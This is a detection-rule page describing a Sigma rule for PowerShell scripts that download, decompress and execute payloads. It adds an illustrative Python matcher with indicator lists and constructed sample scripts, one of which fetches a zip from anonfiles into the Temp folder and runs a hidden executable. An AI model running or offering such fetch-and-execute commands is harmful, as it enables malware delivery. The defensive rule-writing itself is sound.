Potentially Suspicious PowerShell Script With Decompression And Download Capabilities Executed

Rule Info

Name
Potentially Suspicious PowerShell Script With Decompression And Download Capabilities Executed
Author
Nasreddine Bencherchali (Nextron Systems)
Description
Detects the execution of a potentially suspicious PowerShell script that contains references to "Download", "Decompression" and "Execution" cmdlets together with suspicious paths and file sharing websites. Threat actors have been seen leveraging PowerShell scripts that download a compressed malicious payload from a file sharing domain such as "anonfiles" or from a CDN hosting platform, decompress it and store it in an unusual location such as a "Temp" directory, and then execute it.
Date
2024-06-06 00:00:00
Modified
None
Id
387e16a3-ed06-4ecb-9b9c-7dae0d067440
Tags
attack.defense_evasion attack.t1140
Type
Nextron Sigma feed only (private)
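
The rule itself is private, so its selections and condition are not on this page. The following is an added example, written by the editor and not taken from the Nextron rule, that approximates the behaviour the description outlines: it flags script content only when all three capability categories (download, decompression, execution) occur together with both context indicators (a suspicious staging path and a file sharing domain). The keyword lists, the requirement that all five categories be present, and the three sample scripts are assumptions and constructed inputs, not the rule's actual terms.

```python
import re

# Assumed indicator lists approximating the categories named in the rule
# description. These are the editor's choices, not the private rule's terms.
DOWNLOAD = [
    r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod",
    r"\.DownloadFile\(", r"\.DownloadString\(", r"Start-BitsTransfer",
]
DECOMPRESS = [
    r"Expand-Archive", r"ExtractToDirectory\(", r"GZipStream",
    r"DeflateStream", r"ZipFile\]::",
]
EXECUTE = [
    r"Start-Process", r"Invoke-Expression", r"\biex\b", r"Invoke-Item",
]
SUSPICIOUS_PATHS = [
    r"\$env:TEMP", r"\\AppData\\Local\\Temp", r"\\Windows\\Temp",
    r"\\ProgramData\\", r"\\Users\\Public\\",
]
FILE_SHARING = [
    r"anonfiles\.com", r"transfer\.sh", r"cdn\.discordapp\.com",
    r"mediafire\.com", r"gofile\.io",
]


def _hits(patterns, text):
    """Return the patterns from `patterns` that occur in `text` (case-insensitive)."""
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def classify_script(script_text):
    """Evaluate one script body against the five categories.

    `match` is True only when download, decompression and execution
    capabilities all appear AND both context indicators (staging path and
    file sharing domain) are present. `evidence` lists what fired per
    category so an analyst can tune the lists or loosen the condition.
    """
    evidence = {
        "download": _hits(DOWNLOAD, script_text),
        "decompress": _hits(DECOMPRESS, script_text),
        "execute": _hits(EXECUTE, script_text),
        "path": _hits(SUSPICIOUS_PATHS, script_text),
        "filesharing": _hits(FILE_SHARING, script_text),
    }
    match = all(evidence[k] for k in evidence)
    return {"match": match, "evidence": evidence}


# Constructed sample script bodies (not real observed payloads).
SAMPLE_MALICIOUS = r"""
$u = 'https://anonfiles.com/abc123/payload_zip'
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\p.zip"
Expand-Archive -Path "$env:TEMP\p.zip" -DestinationPath "$env:TEMP\p" -Force
Start-Process "$env:TEMP\p\svc.exe" -WindowStyle Hidden
"""

# Benign admin script: decompresses and runs an installer, but downloads nothing.
SAMPLE_BENIGN = r"""
Expand-Archive -Path C:\Installers\tool.zip -DestinationPath 'C:\Program Files\Tool'
Start-Process 'C:\Program Files\Tool\setup.exe' -Wait
"""

# Has all three capabilities and a Temp path, but the source is an internal
# host rather than a file sharing site, so the strict condition does not fire.
SAMPLE_INTERNAL = r"""
Invoke-WebRequest -Uri 'https://build.corp.example/agent.zip' -OutFile "$env:TEMP\agent.zip"
Expand-Archive -Path "$env:TEMP\agent.zip" -DestinationPath "$env:TEMP\agent"
Start-Process "$env:TEMP\agent\install.exe" -Wait
"""


def scan_samples():
    """Classify the three constructed samples; returns {name: match_bool}."""
    samples = {
        "malicious": SAMPLE_MALICIOUS,
        "benign": SAMPLE_BENIGN,
        "internal": SAMPLE_INTERNAL,
    }
    return {name: classify_script(body)["match"] for name, body in samples.items()}


if __name__ == "__main__":
    for name, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN), ("internal", SAMPLE_INTERNAL)):
        result = classify_script(body)
        print(name, "->", result["match"], result["evidence"])
```

The third sample shows the trade-off a practitioner has to make when tuning such a rule: dropping the file sharing requirement would catch internally hosted staging as well, at the cost of flagging legitimate software deployment scripts that use the same cmdlet chain into Temp.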

Rule History